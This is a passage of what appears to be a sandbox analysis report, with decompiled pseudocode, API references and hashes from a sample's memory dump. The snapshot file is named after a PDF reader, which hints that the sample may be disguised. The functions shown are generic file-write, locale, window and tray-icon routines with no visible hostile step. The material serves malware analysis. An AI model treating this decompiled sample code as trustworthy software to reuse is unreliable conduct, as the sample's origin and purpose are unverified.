									if(_t78 < _v12) {
										_t65 = E00418F98(_t88, _t93,  *_v8, _t96);
										__eflags = _t65 - 0xffffffff;
										if(_t65 == 0xffffffff) {
											L34:
											_t66 = _t93;
											L35:
											return (_t66 - _t78) / _a8;
										}
										_v8 = _v8 + 1;
										_t69 =  *(_t96 + 0x18);
										_t78 = _t78 - 1;
										_v12 = _t69;
										__eflags = _t69;
										if(_t69 <= 0) {
											_v12 = 1;
										}
										goto L31;
									}
									__eflags = _t81;
									if(_t81 == 0) {
										L21:
										__eflags = _v12;
										_t94 = _t78;
										if(_v12 != 0) {
											_t72 = _t78;
											_t88 = _t72 % _v12;
											_t94 = _t94 - _t72 % _v12;
											__eflags = _t94;
										}
										_push(_t94);
										_push(_v8);
										_push(E00414139(_t96));
										_t71 = E0041B7B2(_t78, _t88, _t94, _t96, __eflags);
										_t97 = _t97 + 0xc;
										__eflags = _t71 - 0xffffffff;
										if(_t71 == 0xffffffff) {
											L36:
											 *(_t96 + 0xc) =  *(_t96 + 0xc) | 0x00000020;
											_t66 = _v16;
											goto L35;
										} else {
											_t85 = _t94;
											__eflags = _t71 - _t94;
											if(_t71 <= _t94) {
												_t85 = _t71;
											}
											_v8 = _v8 + _t85;
											_t78 = _t78 - _t85;
											__eflags = _t71 - _t94;
											if(_t71 < _t94) {
												goto L36;
											} else {
												L27:
												_t93 = _v16;
												goto L31;
											}
										}
									}
									_t74 = E0041443C(_t88, _t96);
									__eflags = _t74;
									if(_t74 != 0) {
										goto L34;
									}
									goto L21;
								}
								_t75 =  *(_t96 + 4);
								__eflags = _t75;
								if(__eflags == 0) {
									goto L18;
								}
								if(__eflags < 0) {
									_t45 = _t96 + 0xc;
									 *_t45 =  *(_t96 + 0xc) | 0x00000020;
									__eflags =  *_t45;
									goto L34;
								}
								_t95 = _t78;
								__eflags = _t78 - _t75;
								if(_t78 >= _t75) {
									_t95 = _t75;
								}
								E00410E60( *_t96, _v8, _t95);
								 *(_t96 + 4) =  *(_t96 + 4) - _t95;
								 *_t96 =  *_t96 + _t95;
								_t97 = _t97 + 0xc;
								_t78 = _t78 - _t95;
								_v8 = _v8 + _t95;
								goto L27;
								L31:
								__eflags = _t78;
							} while (_t78 != 0);
							goto L32;
						}
					}
					L3:
					 *((intOrPtr*)(E00417F77(_t100))) = 0x16;
					E00417F25();
					goto L4;
				}
			}





























                                  0x0041416a
                                  0x0041416f
                                  0x0041418e
                                  0x00000000
                                  0x00414177
                                  0x00414177
                                  0x0041417a
                                  0x0041417c
                                  0x00414195
                                  0x00414198
                                  0x0041419a
                                  0x00000000
                                  0x00000000
                                  0x0041419c
                                  0x004141a1
                                  0x004141a3
                                  0x004141a6
                                  0x00000000
                                  0x00000000
                                  0x004141a8
                                  0x004141ac
                                  0x004141b3
                                  0x004141b6
                                  0x004141b9
                                  0x004141bb
                                  0x004141c5
                                  0x004141bd
                                  0x004141c0
                                  0x004141c0
                                  0x004141cc
                                  0x004141ce
                                  0x00414293
                                  0x00000000
                                  0x004141d4
                                  0x004141d4
                                  0x004141d7
                                  0x004141d7
                                  0x004141dd
                                  0x0041420e
                                  0x0041420e
                                  0x00414211
                                  0x0041426a
                                  0x00414271
                                  0x00414274
                                  0x0041429f
                                  0x0041429f
                                  0x004142a1
                                  0x00000000
                                  0x004142a5
                                  0x00414276
                                  0x00414279
                                  0x0041427c
                                  0x0041427d
                                  0x00414280
                                  0x00414282
                                  0x00414284
                                  0x00414284
                                  0x00000000
                                  0x00414282
                                  0x00414213
                                  0x00414215
                                  0x00414222
                                  0x00414222
                                  0x00414226
                                  0x00414228
                                  0x0041422c
                                  0x0041422e
                                  0x00414231
                                  0x00414231
                                  0x00414231
                                  0x00414233
                                  0x00414234
                                  0x0041423e
                                  0x0041423f
                                  0x00414244
                                  0x00414247
                                  0x0041424a
                                  0x004142ad
                                  0x004142ad
                                  0x004142b1
                                  0x00000000
                                  0x0041424c
                                  0x0041424c
                                  0x0041424e
                                  0x00414250
                                  0x00414252
                                  0x00414252
                                  0x00414254
                                  0x00414257
                                  0x00414259
                                  0x0041425b
                                  0x00000000
                                  0x0041425d
                                  0x0041425d
                                  0x0041425d
                                  0x00000000
                                  0x0041425d
                                  0x0041425b
                                  0x0041424a
                                  0x00414218
                                  0x0041421e
                                  0x00414220
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00414220
                                  0x004141df
                                  0x004141e2
                                  0x004141e4
                                  0x00000000
                                  0x00000000
                                  0x004141e6
                                  0x0041429b
                                  0x0041429b
                                  0x0041429b
                                  0x00000000
                                  0x0041429b
                                  0x004141ec
                                  0x004141ee
                                  0x004141f0
                                  0x004141f2
                                  0x004141f2
                                  0x004141fa
                                  0x004141ff
                                  0x00414202
                                  0x00414204
                                  0x00414207
                                  0x00414209
                                  0x00000000
                                  0x0041428b
                                  0x0041428b
                                  0x0041428b
                                  0x00000000
                                  0x004141d4
                                  0x004141ce
                                  0x0041417e
                                  0x00414183
                                  0x00414189
                                  0x00000000
                                  0x00414189

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                  • String ID:
                                  • API String ID: 2782032738-0
                                  • Opcode ID: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                  • Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
                                  • Opcode Fuzzy Hash: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                  • Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00441672 Relevance: 6.1, APIs: 4, Instructions: 116windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 98%
                                  			E00441672(signed int __eax, signed int* _a4, struct tagPOINT _a8, intOrPtr _a12) {
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				struct tagRECT _v36;
				signed int _t38;
				intOrPtr _t40;
				signed int _t44;
				intOrPtr _t45;
				struct HWND__*** _t46;
				struct HWND__** _t47;
				intOrPtr* _t52;
				intOrPtr _t54;
				intOrPtr _t57;
				signed int _t58;
				signed char _t60;
				intOrPtr _t62;
				intOrPtr _t68;
				signed int _t76;
				signed int _t80;
				void* _t86;
				void* _t96;

				_t38 = __eax | 0xffffffff;
				_v12 = _t38;
				_v16 = _t38;
				_t40 =  *0x4a8690; // 0x0
				ClientToScreen( *( *( *(_t40 +  *_a4 * 4))),  &_a8);
				_t54 =  *0x4a8694; // 0x0
				_t80 = 0;
				if(_t54 <= 0) {
					L24:
					_t44 = MessageBeep(0) | 0xffffffff;
					goto L25;
				} else {
					do {
						_t57 =  *0x4a8690; // 0x0
						_t68 =  *((intOrPtr*)( *((intOrPtr*)(_t57 + _t80 * 4))));
						_v20 = _t68;
						if(_t68 == 0) {
							goto L17;
						} else {
							_t76 = 3;
							_t86 =  *0x4a86b4 - _t76; // 0x2
							if(_t86 < 0) {
								goto L17;
							} else {
								while(1) {
									_t45 =  *0x4a86a4; // 0xa71980
									_t46 =  *(_t45 + _t76 * 4);
									if( *_t46 == 0) {
										goto L16;
									}
									L6:
									_t47 =  *_t46;
									if(_t47[1] !=  *((intOrPtr*)(_t68 + 4)) || (_t47[0x22] & 0x00000020) != 0) {
										goto L16;
									} else {
										_t60 = _t47[0x22];
										if(_t60 == 0xff || (_t60 & 0x000000ff) ==  *((intOrPtr*)(_t68 + 0x194))) {
											GetWindowRect( *_t47,  &_v36);
											_push(_a12);
											if(PtInRect( &_v36, _a8) == 0) {
												goto L16;
											} else {
												_t52 = _a4;
												if( *_t52 != _t80) {
													_v16 = _t80;
												}
												_t62 =  *0x4a86a4; // 0xa71980
												if(( *( *((intOrPtr*)( *((intOrPtr*)(_t62 + _t76 * 4)))) + 0x8a) & 0x00000008) != 0) {
													if( *_t52 != _t80) {
														 *_t52 = _v16;
													}
													return _t76;
												} else {
													if(_v12 < 0) {
														_v12 = _t76;
													}
													goto L16;
												}
											}
										} else {
											goto L16;
										}
									}
									goto L26;
									L16:
									_t76 = _t76 + 1;
									_t96 = _t76 -  *0x4a86b4; // 0x2
									if(_t96 <= 0) {
										_t68 = _v20;
										_t45 =  *0x4a86a4; // 0xa71980
										_t46 =  *(_t45 + _t76 * 4);
										if( *_t46 == 0) {
											goto L16;
										}
									} else {
										goto L17;
									}
									goto L26;
								}
							}
						}
						goto L26;
						L17:
						_t80 = _t80 + 1;
					} while (_t80 < _t54);
					_t44 = _v12;
					if(_t44 < 0) {
						goto L24;
					} else {
						_t58 = _v16;
						if(_t58 < 0) {
							L25:
							return _t44;
						} else {
							 *_a4 = _t58;
							return _t44;
						}
					}
				}
				L26:
			}
























                                  0x0044167e
                                  0x00441682
                                  0x00441685
                                  0x0044168d
                                  0x0044169a
                                  0x004416a0
                                  0x004416a6
                                  0x004416aa
                                  0x004417ab
                                  0x004417b3
                                  0x00000000
                                  0x004416b0
                                  0x004416b0
                                  0x004416b0
                                  0x004416b9
                                  0x004416bb
                                  0x004416c0
                                  0x00000000
                                  0x004416c6
                                  0x004416c6
                                  0x004416cb
                                  0x004416d1
                                  0x00000000
                                  0x004416d7
                                  0x004416e5
                                  0x004416e5
                                  0x004416ea
                                  0x004416f0
                                  0x00000000
                                  0x00000000
                                  0x004416f2
                                  0x004416f2
                                  0x004416fa
                                  0x00000000
                                  0x00441705
                                  0x00441705
                                  0x0044170e
                                  0x00441722
                                  0x0044172e
                                  0x0044173c
                                  0x00000000
                                  0x0044173e
                                  0x0044173e
                                  0x00441743
                                  0x00441745
                                  0x00441745
                                  0x00441748
                                  0x0044175a
                                  0x00441799
                                  0x0044179e
                                  0x0044179e
                                  0x004417a8
                                  0x0044175c
                                  0x00441760
                                  0x00441762
                                  0x00441762
                                  0x00000000
                                  0x00441760
                                  0x0044175a
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0044170e
                                  0x00000000
                                  0x00441765
                                  0x00441765
                                  0x00441766
                                  0x0044176c
                                  0x004416e2
                                  0x004416e5
                                  0x004416ea
                                  0x004416f0
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0044176c
                                  0x004416e5
                                  0x004416d1
                                  0x00000000
                                  0x00441772
                                  0x00441772
                                  0x00441773
                                  0x0044177b
                                  0x00441780
                                  0x00000000
                                  0x00441782
                                  0x00441782
                                  0x00441787
                                  0x004417b6
                                  0x004417bc
                                  0x00441789
                                  0x0044178c
                                  0x00441794
                                  0x00441794
                                  0x00441787
                                  0x00441780
                                  0x00000000

                                  APIs
                                  • ClientToScreen.USER32(00000000,?), ref: 0044169A
                                  • GetWindowRect.USER32 ref: 00441722
                                  • PtInRect.USER32(?,?,?), ref: 00441734
                                  • MessageBeep.USER32(00000000), ref: 004417AD
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Rect$BeepClientMessageScreenWindow
                                  • String ID:
                                  • API String ID: 1352109105-0
                                  • Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                  • Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
                                  • Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                  • Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0042083F Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0042083F(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				intOrPtr _t57;
				int _t58;
				char _t59;
				short* _t60;
				int _t65;
				char* _t73;

				_t73 = _a8;
				if(_t73 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t73 != 0) {
						E00411321( &_v20, __edi, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E004131B1( *_t73 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								_t40 = _v20 + 4; // 0xbbdae900
								__eflags = MultiByteToWideChar( *_t40, 9, _t73, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E00417F77(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t15 = _t56 + 0xac; // 0x1ac
							_t65 =  *_t15;
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								_t24 = _t56 + 0xac; // 0x1ac
								__eflags = _a12 -  *_t24;
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t73[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								_t26 = _t56 + 0xac; // 0x1ac
								_t57 =  *_t26;
								__eflags = _v8;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t21 = _t56 + 4; // 0xbbdae900
							_t58 = MultiByteToWideChar( *_t21, 9, _t73, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t73 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

















                                  0x00420849
                                  0x00420850
                                  0x00420867
                                  0x00000000
                                  0x00420857
                                  0x00420859
                                  0x00420873
                                  0x00420878
                                  0x0042087b
                                  0x0042087e
                                  0x004208a6
                                  0x004208ad
                                  0x004208af
                                  0x00420930
                                  0x00420942
                                  0x0042094b
                                  0x0042094d
                                  0x0042088d
                                  0x0042088d
                                  0x00420890
                                  0x00420892
                                  0x00420895
                                  0x00420895
                                  0x00420895
                                  0x00420895
                                  0x00000000
                                  0x0042089b
                                  0x0042090f
                                  0x0042090f
                                  0x00420914
                                  0x0042091a
                                  0x0042091d
                                  0x0042091f
                                  0x00420922
                                  0x00420922
                                  0x00420922
                                  0x00420922
                                  0x00000000
                                  0x00420926
                                  0x004208b1
                                  0x004208b4
                                  0x004208b4
                                  0x004208ba
                                  0x004208bd
                                  0x004208e4
                                  0x004208e7
                                  0x004208e7
                                  0x004208ed
                                  0x00000000
                                  0x00000000
                                  0x004208ef
                                  0x004208f2
                                  0x00000000
                                  0x00000000
                                  0x004208f4
                                  0x004208f4
                                  0x004208f4
                                  0x004208fa
                                  0x004208fd
                                  0x0042086c
                                  0x0042086c
                                  0x00420906
                                  0x00000000
                                  0x00420906
                                  0x004208bf
                                  0x004208c2
                                  0x00000000
                                  0x00000000
                                  0x004208c6
                                  0x004208d4
                                  0x004208d7
                                  0x004208dd
                                  0x004208df
                                  0x004208e2
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004208e2
                                  0x00420880
                                  0x00420883
                                  0x00420885
                                  0x0042088a
                                  0x0042088a
                                  0x00000000
                                  0x0042085b
                                  0x0042085b
                                  0x00420860
                                  0x00420864
                                  0x00420864
                                  0x00000000
                                  0x00420860
                                  0x00420859

                                  APIs
                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                                  • __isleadbyte_l.LIBCMT ref: 004208A6
                                  • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                                  • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                  • String ID:
                                  • API String ID: 3058430110-0
                                  • Opcode ID: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                  • Instruction ID: f6550d230e50e909e13d2a99824cc28569674f7a7b9e5ef0daa2e7ce22e82e6e
                                  • Opcode Fuzzy Hash: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                  • Instruction Fuzzy Hash: D731E231B00265EFDB20EF65E884AAF3BE5BF00310F55496AE4658B292D734CD80DB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00442A83 Relevance: 6.1, APIs: 4, Instructions: 87windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 95%
                                  			E00442A83(intOrPtr _a4) {
				struct tagMSG _v32;
				void* __ebx;
				int _t28;
				intOrPtr _t41;

				_t41 = _a4;
				if( *0x4974e3 != 0 ||  *0x4a8668 != 0 &&  *(_t41 + 0xf8) == 0) {
					return 0;
				} else {
					_t28 = 1;
					if(PeekMessageW( &_v32, 0, 0, 0, 1) != 0) {
						while(_v32.message != 0x12) {
							if(E0040D150(0x4a8630,  &_v32) == 0) {
								if(E0040D170(0x4a8630,  &_v32) == 0) {
									TranslateMessage( &_v32);
									DispatchMessageW( &_v32);
								}
								_t28 = 1;
							}
							if(PeekMessageW( &_v32, 0, 0, 0, _t28) != 0) {
								continue;
							} else {
							}
							goto L14;
						}
						 *(_t41 + 0xfc) = _t28;
						 *(_t41 + 0xf8) = _t28;
					}
					L14:
					if( *0x4974e6 == _t28) {
						 *0x4974ec = 0;
						 *0x4974e6 = 0;
						 *(_t41 + 0xf8) = _t28;
					}
					if( *(_t41 + 0xf8) != _t28) {
						asm("sbb eax, eax");
						return  ~( *0x4974ec & 0x000000ff) & 0x0000000b;
					} else {
						return _t28;
					}
				}
			}







                                  0x00442a91
                                  0x00442a94
                                  0x00442aae
                                  0x00442ab1
                                  0x00442ab9
                                  0x00442acd
                                  0x00442ad3
                                  0x00442ae9
                                  0x00442afb
                                  0x00442b01
                                  0x00442b0b
                                  0x00442b0b
                                  0x00442b11
                                  0x00442b11
                                  0x00442b25
                                  0x00000000
                                  0x00000000
                                  0x00442b27
                                  0x00000000
                                  0x00442b25
                                  0x00442b29
                                  0x00442b2f
                                  0x00442b2f
                                  0x00442b35
                                  0x00442b3b
                                  0x00442b3d
                                  0x00442b44
                                  0x00442b4b
                                  0x00442b4b
                                  0x00442b57
                                  0x00442b6e
                                  0x00442b78
                                  0x00442b59
                                  0x00442b61
                                  0x00442b61
                                  0x00442b57

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Message$Peek$DispatchTranslate
                                  • String ID:
                                  • API String ID: 1795658109-0
                                  • Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                  • Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
                                  • Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                  • Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040E0C0 Relevance: 6.1, APIs: 4, Instructions: 82windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040E0C0(intOrPtr __esi, void* __fp0) {
				struct _NOTIFYICONDATAW _v940;
				struct HICON__* _t31;
				long _t33;
				long _t34;
				intOrPtr _t41;
				intOrPtr _t47;
				intOrPtr _t48;
				long _t51;
				intOrPtr _t53;
				void* _t64;

				_t64 = __fp0;
				_t53 = __esi;
				_v940.cbSize = 0x3a8;
				E00412F40( &(_v940.hWnd), 0, 0x3a4);
				if( *((intOrPtr*)(__esi + 0x198)) == 0) {
					_t48 =  *0x4a7f44; // 0xf045b
					 *((intOrPtr*)(__esi + 0x198)) = _t48;
				}
				if( *((intOrPtr*)(_t53 + 0x1a4)) == 0) {
					_t41 =  *0x4a7f48; // 0xf043f
					 *((intOrPtr*)(_t53 + 0x1a4)) = _t41;
					 *((intOrPtr*)(_t53 + 0x1a8)) = _t41;
				}
				if( *((intOrPtr*)(_t53 + 0x1b0)) == 0) {
					_t47 =  *0x4a7f4c; // 0x3702d5
					 *((intOrPtr*)(_t53 + 0x1b0)) = _t47;
				}
				_t10 = _t53 + 0x19c; // 0x0
				_t31 =  *_t10;
				_t11 = _t53 + 0x1a0; // 0x4a88b0
				_t51 = _t11;
				if(_t31 != 0) {
					if( *_t51 != 0) {
						DestroyIcon(_t31);
					}
				}
				 *(_t53 + 0x19c) = 0;
				 *_t51 = 0;
				_v940.hWnd =  *0x497518;
				_v940.uID = 1;
				_v940.uFlags = 3;
				_v940.uCallbackMessage = 0x401;
				_v940.hIcon = 0;
				if( *((intOrPtr*)(_t53 + 0x40)) != 0) {
					_t23 = _t53 + 0x3c; // 0xa719b0
					_t24 = _t53 + 0x10; // 0xffffffff
					_t33 = E004341E6(_t53,  *_t24,  *_t23, _t51);
					_v940.hWnd = _t33;
					 *(_t53 + 0x19c) = _t33;
					if( *((intOrPtr*)(_t53 + 0x40)) == 0) {
						goto L8;
					}
					if(_t33 != 0) {
						goto L9;
					}
					goto L8;
				} else {
					L8:
					_t19 = _t53 + 0x198; // 0x0
					_t34 =  *_t19;
					_v940.hIcon = _t34;
					 *(_t53 + 0x19c) = _t34;
					L9:
					if( *0x4974ea == 1) {
						Shell_NotifyIconW(1,  &_v940);
					} else {
						Shell_NotifyIconW(0,  &_v940);
						 *0x4974ea = 1;
					}
					return E00401B80(_t53, _t64);
				}
			}













                                  0x0040e0c0
                                  0x0040e0c0
                                  0x0040e0da
                                  0x0040e0e2
                                  0x0040e0f1
                                  0x0040e0f3
                                  0x0040e0f9
                                  0x0040e0f9
                                  0x0040e106
                                  0x0040e108
                                  0x0040e10d
                                  0x0040e113
                                  0x0040e113
                                  0x0040e120
                                  0x0040e122
                                  0x0040e128
                                  0x0040e128
                                  0x0040e12e
                                  0x0040e12e
                                  0x0040e134
                                  0x0040e134
                                  0x0040e13c
                                  0x00427299
                                  0x004272a0
                                  0x004272a0
                                  0x00427299
                                  0x0040e148
                                  0x0040e152
                                  0x0040e15e
                                  0x0040e162
                                  0x0040e166
                                  0x0040e16e
                                  0x0040e176
                                  0x0040e17e
                                  0x004272ab
                                  0x004272ae
                                  0x004272b5
                                  0x004272be
                                  0x004272c2
                                  0x004272c8
                                  0x00000000
                                  0x00000000
                                  0x004272d0
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040e184
                                  0x0040e184
                                  0x0040e184
                                  0x0040e184
                                  0x0040e18a
                                  0x0040e18e
                                  0x0040e194
                                  0x0040e19a
                                  0x004272e1
                                  0x0040e1a0
                                  0x0040e1a7
                                  0x0040e1ad
                                  0x0040e1ad
                                  0x0040e1bf
                                  0x0040e1bf

                                  APIs
                                  • _memset.LIBCMT ref: 0040E0E2
                                  • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: IconNotifyShell__memset
                                  • String ID:
                                  • API String ID: 928536360-0
                                  • Opcode ID: 245d695d0f2af4038a59a525fce9533f4fc2119324cc59ce2a552f74bd7fa797
                                  • Instruction ID: eb3a406907b17a2fb372061a5351d340f380801689ea858bebf243c914dbfa85
                                  • Opcode Fuzzy Hash: 245d695d0f2af4038a59a525fce9533f4fc2119324cc59ce2a552f74bd7fa797
                                  • Instruction Fuzzy Hash: 16318F70608701DFD320CF25D855797BBE4BB85314F000C3EE5AA87391E7B8A958CB5A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00434CC9 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 75stringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 65%
